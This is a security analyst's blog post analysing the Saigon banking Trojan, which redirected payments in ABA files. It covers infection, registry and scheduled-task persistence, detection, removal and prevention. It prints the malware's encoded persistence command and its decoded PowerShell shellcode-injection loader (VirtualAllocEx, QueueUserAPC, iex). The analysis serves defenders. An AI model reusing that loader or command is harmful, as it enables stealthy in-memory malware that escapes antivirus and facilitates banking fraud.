Saigon Banking Trojan

Recently we investigated a number of cyber incidents where the ABA file appeared to have been edited to redirect funds to another bank, some time between the time the file was downloaded and then uploaded to the bank.

ABA files are created by accounting programs so they can be uploaded to bank websites and streamline batch payment of accounts.

Due to the fact the malware can remove itself we were unable to identify the root cause until we discovered an archived copy of the user’s profile data from the time of the incident, where the malware still existed in the profile.

What is Saigon?

Saigon is a Trojan designed to allow a threat actor to facilitate banking fraud whilst remaining virtually undetectable from an end user; the malware is a fork of the popular UrSnif malware family which has been in existence since being identified in 2006. Saigon possesses the ability to remove itself and its related artifacts from a system which can make it difficult to detect retroactively without the use of backups/snapshots taken during a Saigon compromise.

How does Saigon enter a system?

Saigon is versatile in its attack vectors and has numerous different entry points into a targeted system; the most common method is through malicious files or links masquerading as legitimate files or websites and designed specifically to entice a user to open them. In the case of malicious attachments, this is usually achieved through macros commonly written in VBA (Visual Basic for Applications); once opened the user is prompted to enable macros which will then execute code, contact a C2 (Command and Control Server) and download the payload. Whilst this is the most common method of distribution, Saigon may also be distributed through compromised software application installers or included within torrents available on file sharing websites; this is another reason to install software exclusively from trusted vendors/publishers and legitimate sources.

How do you detect Saigon?

As Saigon is a file-less Trojan, it can be extremely difficult to detect on a system if you are not aware of its existence. Many anti-virus solutions will scan only for malicious files and as a result will typically fail to detect this malware as it does not exist on the disk. Saigon exists as a user setting in the Windows user registry database and the malware will be loaded into memory once the affected user logs in. It will appear as a non-human readable format (Base64 encoded shell-code blob) in a particular registry key (typically “HKCU:\Software\Identities\<random_guid>” though we have also discovered it in alternative registry keys).

In order to maintain persistence and survive system reboots, the malware will create a scheduled task with the prefix “Power” and a suffix of a random characters (i.e. PowerTpd); if a scheduled task fails to be created it will instead embed itself in the Run key found at: “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” with a Base64 encoded string visible

In this command, forfiles selects and runs a user command on a file or set of files with /p specifying the path of C:\Windows\system32, the /s parameter instructs the command to search sub-directories recursively, and /c has the command be executed as a parameter which in this case is “cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATwBsAGQAcwBjAGEAbABlACcAKQAuAEMA”. The -ec indicates an Encoded Command and allows the use of a base64 encoded string as a command. Threat actors will often encode the commands in order to avoid detection and make it more difficult to analyse and reconstruct their activities.

Once decoded from Base64, the string appears as “iex (gp 'HKCU:\Identities\{CB1BC52B-3A80-D94C-BB50-BE78BFEB3700}').C”.  This will use Invoke-Expression (iex) to execute the specified malicious registry value that is found using the Get-ItemProperty (gp), in this instance it is ‘HKCU:\Identities\{CB1BC52B-3A80-D94C-BB50-BE78BFEB3700}

The /m denotes the search mask, in this case it is pushing the encoded command into PowerShell and then executing it.

Once we have navigated to the specified Registry Key we are able to see the malicious obfuscated code is executed.

At the very bottom of this obfuscated code are additional Base64 commands which we can decode.

Encoded Base64:

function autrvnchp{$dtaasegvwm=pmidvtkfutt($args[0]);[System.Text.Encoding]::ASCII.GetString($dtaasegvwm);};iex(autrvnchp("DQokdW54Z3Rldj0iW0RsbEltcG9ydChgImtlcm5lbDMyYCIpXWBucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEN1cnJlbnRUaHJlYWRJZCgpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCIpXWBucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIE9wZW5UaHJlYWQodWludCBncXh4dHNzbmZ0LHVpbnQgbG5iLEludFB0ciB5cW91Y3hsbmVsKTtgbltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF0aWMgZXh0ZXJuIHVpbnQgUXVldWVVc2VyQVBDKEludFB0ciBocHN1cnksSW50UHRyIGp3byxJbnRQdHIgbm12amtveG5wZ3YpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCIpXWBucHVibGljIHN0YXRpYyBleHRlcm4gdm9pZCBTbGVlcEV4KHVpbnQgdHJ1LHVpbnQgZW9mYXhqKTsiOyRudGJ5YmI9QWRkLVR5cGUgLW1lbWJlckRlZmluaXRpb24gJHVueGd0ZXYgLU5hbWUgJ3NucXd5ZHZscXVoJyAtbmFtZXNwYWNlIFdpbjMyRnVuY3Rpb25zIC1wYXNzdGhydTskYWx0ZW9mZWxyPSJvZXdkIjskYmVja3Bsc249IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCIpXWBucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFZpcnR1YWxBbGxvY0V4KEludFB0ciBidGFwYWZ5eW8sSW50UHRyIGpvYXNwLHVpbnQgdXloYyx1aW50IHdjaGNmYnBpeXQsdWludCBqYnBwcG9xbHFhdyk7IjskY3J5PUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICRiZWNrcGxzbiAtTmFtZSAnb2pyZXdhcCcgLW5hbWVzcGFjZSBXaW4zMkZ1bmN0aW9ucyAtcGFzc3RocnU7DQo="));iex(autrvnchp("DQokcWRwcW52PSJxdGV5Y3ZzbmciO2lmKCRycGJvPSRjcnk6OlZpcnR1YWxBbGxvY0V4KCRjcnk6OkdldEN1cnJlbnRQcm9jZXNzKCksMCwkeXliY2FvLkxlbmd0aCwxMjI4OCw2NCkpe1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkNvcHkoJHl5YmNhbywwLCRycGJvLCR5eWJjYW8ubGVuZ3RoKTtpZigkbnRieWJiOjpRdWV1ZVVzZXJBUEMoJHJwYm8sJG50YnliYjo6T3BlblRocmVhZCgxNiwwLCRudGJ5YmI6OkdldEN1cnJlbnRUaHJlYWRJZCgpKSwkcnBibykpeyRudGJ5YmI6OlNsZWVwRXgoMywxKTt9fQ0K"));

Decoded Base64:

function autrvnchp{$dtaasegvwm=pmidvtkfutt($args[0]);[System.Text.Encoding]::ASCII.GetString($dtaasegvwm);};iex(autrvnchp("$unxgtev="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentThreadId();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr OpenThread(uint gqxxtssnft,uint lnb,IntPtr yqoucxlnel);`n[DllImport(`"kernel32`")]`npublic static extern uint QueueUserAPC(IntPtr hpsury,IntPtr jwo,IntPtr nmvjkoxnpgv);`n[DllImport(`"kernel32`")]`npublic static extern void SleepEx(uint tru,uint eofaxj);";$ntbybb=Add-Type -memberDefinition $unxgtev -Name 'snqwydvlquh' -namespace Win32Functions -passthru;$alteofelr="oewd";$beckplsn="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentProcess();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr VirtualAllocEx(IntPtr btapafyyo,IntPtr joasp,uint uyhc,uint wchcfbpiyt,uint jbpppoqlqaw);";$cry=Add-Type -memberDefinition $beckplsn -Name 'ojrewap' -namespace Win32Functions -passthru;"));iex(autrvnchp("$qdpqnv="qteycvsng";if($rpbo=$cry::VirtualAllocEx($cry::GetCurrentProcess(),0,$yybcao.Length,12288,64)){[System.Runtime.InteropServices.Marshal]::Copy($yybcao,0,$rpbo,$yybcao.length);if($ntbybb::QueueUserAPC($rpbo,$ntbybb::OpenThread(16,0,$ntbybb::GetCurrentThreadId()),$rpbo)){$ntbybb::SleepEx(3,1);}}"));

How to remove Saigon?

If Saigon is identified on a system, that system should be considered compromised and immediate measures should be taken to remove the malware. If the system has frequent backups being performed, simply restoring to a backup prior to the malware arriving is probably sufficient to remove the infection.

In the event that backups are not a viable option or you are unaware of the date/source of compromise, the below instructions can assist in removal.

  • Boot the Windows PC into Safe Mode
    • Open the run dialog box (WIN + R)
    • Enter ‘msconfig’ (System Configuration Utility)
    • Navigate to the ‘Boot’ tab and select the ‘Safe Boot’ checkbox
    • Click ‘Apply’ and then ‘OK
    • Click ‘Restart’ once prompted by the system
    • System will boot into Safe Mode
  • Uninstall malicious application (if that is the source of the Saigon infection)
    • Open the run dialog box (WIN + R)
    • Enter ‘appwiz.cpl’ (Add/Remove Programs)
    • Choose the malicious program from the list
    • Click ‘Uninstall
  • Remove Saigon registry keys
    • Open the run dialog box (WIN + R)
    • Enter ‘regedit’ (Registry Editor)
    • Navigate to altered keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • Right click malicious key
    • Click ‘Modify
    • Delete the ‘Value Data’ field
    • Click ‘OK’to save changes
  • Remove Saigon scheduled tasks
    • Open the run dialog box (WIN + R)
    • Enter ‘taskschd.msc’ (Task Scheduler)
    • Select ‘Task Scheduler Library’ from the left sidebar
    • Review Scheduled Tasks (Saigon task name will have the prefix ‘Power’)
    • Click on task and click ‘Actions’ tab to confirm it is malicious
    • In the right sidebar under Action -> Selected Item click ‘Delete’
    • Click ‘Yes’ when prompted to confirm deletion

How to protect against Saigon?

The file-less nature of Saigon unfortunately results in a large number of anti-virus engines being unable to successfully detect the Trojan on a live system as it executes in memory without ever writing to the hard disk itself.

Microsoft AMSI (Anti-Malware Scan Interface) is an open interface for Windows 10 which allows an application (commonly anti-virus programs) to request scans for data that is suspected of being malicious. Additionally, AMSI possesses the ability to detect obfuscated code and has integration with PowerShell, Javascript and VBScript which assists in identifying concealed malware and preventing the payloads in memory from executing. Many popular endpoint protection solutions support integration with AMSI (such as Sophos, AVG, Windows Defender) and by configuring the endpoint protection solution to work with AMSI, it ensures that you are in the best possible position in terms of available protection.   

As the most common method of Saigon distribution continues to be through malicious attachments in phishing emails, macros in Microsoft Office applications should be disabled by default and remain that way unless users have a specific and appropriate reason to enable them. Settings can be configured to automatically run macros from authorised sources (such as Microsoft) or authorised domains if the business has specific requirements to be met. 

The most simple and effective methods for preventing cyber incidents from occurring can be achieved by ensuring the organisation abides by excellent cyber security standards and that staff are trained and equipped with the appropriate knowledge.

As Saigon does currently require user interaction in order to infiltrate a target system, simple measures can be taken to reduce the likelihood of an incident:

  • Do not click on hyperlinks without verifying their authenticity
  • Do not enter login credentials simply because prompted
  • Do not download files/documents/applications from unknown sources without verifying their legitimacy
  • Ensure that business system/applications are up-to-date with the most recent security patches.

Written by: Daniel Schwass (Analyst)

No comment yet, add your voice below!


Add a Comment

Your email address will not be published. Required fields are marked *